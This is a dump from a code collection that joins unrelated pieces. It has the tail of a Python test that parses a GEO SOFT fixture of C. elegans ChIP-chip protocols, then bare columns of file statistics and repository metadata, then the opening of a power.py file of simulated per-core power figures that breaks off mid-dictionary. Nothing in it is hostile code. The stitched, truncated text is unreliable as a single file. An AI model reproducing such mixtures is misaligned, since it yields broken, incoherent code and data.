!Sample_data_processing ChIP-chip_normalization_standard_MA2C_v1 ChIP-chip_normalization_standard_MA2C_v1. First, all the IP and INPUT log ratio values are read from the pairdata file. Secondly, we build GC bins for INPUT and IP based on the GC counts for every probe sequence, which means the INPUT or IP values for any probes who have the same GC counts will be put together. After that, for each GC bin, we calculate the mean for IP and INPUT data, and the covariance between this two channels. By default, the robust mean variance method is applied, which generalizes Tukeys theory of bi-weight estimation where the constant C is set to 2. At last, we adjust the log ratio values for each probe by using the mean and covariance values for their corresponding GC bins, then these values are further normalized by their mean and standard derivation. In case of replicates, when we calculate the MA2Cscore afterwards, we take the median as the score from all the replicates for all the probes within the sliding window defined by bandwidth parameter.
!Sample_description
!Sample_extract_protocol_ch1 Worm_chromatin_immunoprecipitation_vPK1 Worm_chromatin_immunoprecipitation_vPK1. Appropriate amount of extract is incubated overnight with a proper amount of antibody (exceptional antibodies due to better results are incubated 2hrs). Afterwards, 40ul of equilibrated magnetic beads (either protein A or G, depending on antibody) are added and incubated for 2 hrs. Later, washes with FA, 500mM-salt FA, 1M salt FA, TEL, and TE buffer are performed and DNA is eluted in elution buffer (1% SDS in TE with 250 mM NaCl) ? two times with 57 ml volume each, at 65?C. Samples are treated with RNAse, proteinase K and then crosslinks are reversed overnight at 65?C. DNA is purified on qiagen PCR purification columns, tested by q-PCR for ChIP quality, and stored in -20?C for future applications and.
!Sample_extract_protocol_ch2 Worm_chromatin_immunoprecipitation_vPK1 Worm_chromatin_immunoprecipitation_vPK1. Appropriate amount of extract is incubated overnight with a proper amount of antibody (exceptional antibodies due to better results are incubated 2hrs). Afterwards, 40ul of equilibrated magnetic beads (either protein A or G, depending on antibody) are added and incubated for 2 hrs. Later, washes with FA, 500mM-salt FA, 1M salt FA, TEL, and TE buffer are performed and DNA is eluted in elution buffer (1% SDS in TE with 250 mM NaCl) ? two times with 57 ml volume each, at 65?C. Samples are treated with RNAse, proteinase K and then crosslinks are reversed overnight at 65?C. DNA is purified on qiagen PCR purification columns, tested by q-PCR for ChIP quality, and stored in -20?C for future applications and.
!Sample_extract_protocol_comment_ch1
!Sample_extract_protocol_comment_ch2
!Sample_geo_accession
!Sample_growth_protocol_ch1 Worm_L3_growth_and_harvest_vPK1 Worm_L3_growth_and_harvest_vPK1. About 2-7 million of worms are bleached and then hatched in M9 for 24-42 hrs. About 100 embryos are seeded onto the plate to test for contamination and hatching efficiency. Remaining hatched L1 larvae are inoculated in a proper volume of liquid culture. Next day when larvae reach the L3 stage they are cleaned by M9 washes and sucrose gradient and collected by freezing in liquid nitrogen. Just before collection DIC pictures are taken and about 50ul of worms are stained for DAPI to assess the stage.
!Sample_growth_protocol_ch2 Worm_L3_growth_and_harvest_vPK1 Worm_L3_growth_and_harvest_vPK1. About 2-7 million of worms are bleached and then hatched in M9 for 24-42 hrs. About 100 embryos are seeded onto the plate to test for contamination and hatching efficiency. Remaining hatched L1 larvae are inoculated in a proper volume of liquid culture. Next day when larvae reach the L3 stage they are cleaned by M9 washes and sucrose gradient and collected by freezing in liquid nitrogen. Just before collection DIC pictures are taken and about 50ul of worms are stained for DAPI to assess the stage.
!Sample_growth_protocol_comment_ch1
!Sample_growth_protocol_comment_ch2
!Sample_hyb_protocol ChIP-chip_label_hyb_nimblegen_v1 ChIP-chip_label_hyb_nimblegen_v1. DNA was labeled and hybridized to C. elegans tiling array by Roche NimbleGen according to the protocol described in chapter 3 and 4 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, Amplified IP or input DNA was either labeled with Cy5 or Cy3 in the presence of Klenow fragment. The reaction was stopped by the addition of EDTA. Labeled DNA was recovered by isopropanol precipitation, and dried. The labeled DNA was hybridized to C. elegans tiling array for 16 - 20 hours at 42?C.
!Sample_label_ch1 Cy3 Cy3
!Sample_label_ch2 Cy5 Cy5
!Sample_molecule_ch1 genomic DNA genomic DNA
!Sample_molecule_ch2 genomic DNA genomic DNA
!Sample_organism_ch1 Caenorhabditis elegans Caenorhabditis elegans
!Sample_organism_ch2 Caenorhabditis elegans Caenorhabditis elegans
!Sample_platform_id
!Sample_scan_protocol ChIP-chip_scanning_nimblegen_v1 ChIP-chip_scanning_nimblegen_v1. Array scanning and raw data extraction were performed at Roche NimbleGen, according to the protocol described in chapter 5 and 6 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, array signal was scanned by using a GenePix 4000B Scanner with associated software and saved as .tif files of the 532nm and 635nm images individually. Raw signal intensities of the images were extracted and saved as .pair files by using NimbleScan software according to the NimbleScan v2.4 User?s Guide.
!Sample_source_name_ch1
!Sample_source_name_ch2
!Sample_title AB1791_H3_N2_L3_1LM
!Sample_treatment_protocol_ch1 Worm_L3_extraction_vPK1 Worm_L3_extraction_vPK1. Worms are frozen, ground, and crosslinked for 10 minutes in 1% formaldehyde. Later, washed pellets are resuspended in FA buffer and subjected to sonication in Bioruptor (14 pulses of 30 seconds with 1 minute rests in between). Extracts are then spun down and soluble fraction is stored for quality tests and future ChIP.
!Sample_treatment_protocol_ch2 Worm_L3_extraction_vPK1 Worm_L3_extraction_vPK1. Worms are frozen, ground, and crosslinked for 10 minutes in 1% formaldehyde. Later, washed pellets are resuspended in FA buffer and subjected to sonication in Bioruptor (14 pulses of 30 seconds with 1 minute rests in between). Extracts are then spun down and soluble fraction is stored for quality tests and future ChIP.
!Sample_treatment_protocol_comment_ch1
!Sample_treatment_protocol_comment_ch2
^SAMPLE AB1791_H3_N2_L3_1LM
"""
def test_parseSOFT (self):
    """Parse the embedded SOFT-format fixture and check each sample's name.

    Verifies that ``SOFT.parsestring`` splits the fixture text into two
    entities and that each entity's ``SAMPLE`` field carries the expected
    GEO sample title.
    """
    parsed = SOFT.parsestring(self.softstring)
    expected_names = [
        "AB1791_H3_GLP1TS_AD_1_EVERETT",
        "AB1791_H3_N2_L3_1LM",
    ]
    # Index access (not zip) so a short parse result still raises IndexError,
    # matching the original test's failure mode.
    for position, sample_name in enumerate(expected_names):
        self.assertEqual(parsed[position].entity_dict["SAMPLE"], sample_name)
if __name__ == '__main__':
    # Discover and run all TestCase methods in this module when executed
    # directly as a script (no effect when imported).
    unittest.main()
| 166.126316
| 1,051
| 0.824293
| 2,613
| 15,782
| 4.822426
| 0.197857
| 0.015237
| 0.017142
| 0.013967
| 0.857392
| 0.851837
| 0.839695
| 0.83287
| 0.829934
| 0.829934
| 0
| 0.039528
| 0.140793
| 15,782
| 94
| 1,052
| 167.893617
| 0.889749
| 0.001267
| 0
| 0.636364
| 0
| 0.25
| 0.975319
| 0.198591
| 0
| 0
| 0
| 0
| 0.022727
| 1
| 0.022727
| false
| 0
| 0.022727
| 0
| 0.056818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4f65cfe326a32b0ca9a64851895411c4587170eb
| 68,590
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_heteroFair/oldstuff/cmp_perlbenchgamessbzip2calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/oldstuff/cmp_perlbenchgamessbzip2calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/oldstuff/cmp_perlbenchgamessbzip2calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.110078,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.289148,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.557261,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.522999,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.905645,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.519413,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.94806,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.431528,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.75523,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.105279,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0189591,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.179822,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.140214,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.285101,
'Execution Unit/Register Files/Runtime Dynamic': 0.159174,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.464681,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.0814,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.88316,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00331399,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00331399,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00290087,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00113084,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00201419,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.011543,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0312603,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.134792,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.440489,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.457813,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.0759,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0807418,
'L2/Runtime Dynamic': 0.0153871,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.99783,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.82083,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.121668,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.121668,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.57471,
'Load Store Unit/Runtime Dynamic': 2.54253,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.300012,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.600024,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.106475,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.107492,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0727906,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.742569,
'Memory Management Unit/Runtime Dynamic': 0.180283,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 26.6837,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.367293,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.031163,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.265767,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.664223,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 8.36148,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0364225,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.231296,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.167096,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.247957,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.399945,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.201879,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.84978,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.257973,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.63915,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0315681,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0104004,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0900475,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0769175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.121616,
'Execution Unit/Register Files/Runtime Dynamic': 0.0873179,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.198813,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.518096,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.09187,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00181785,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00181785,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
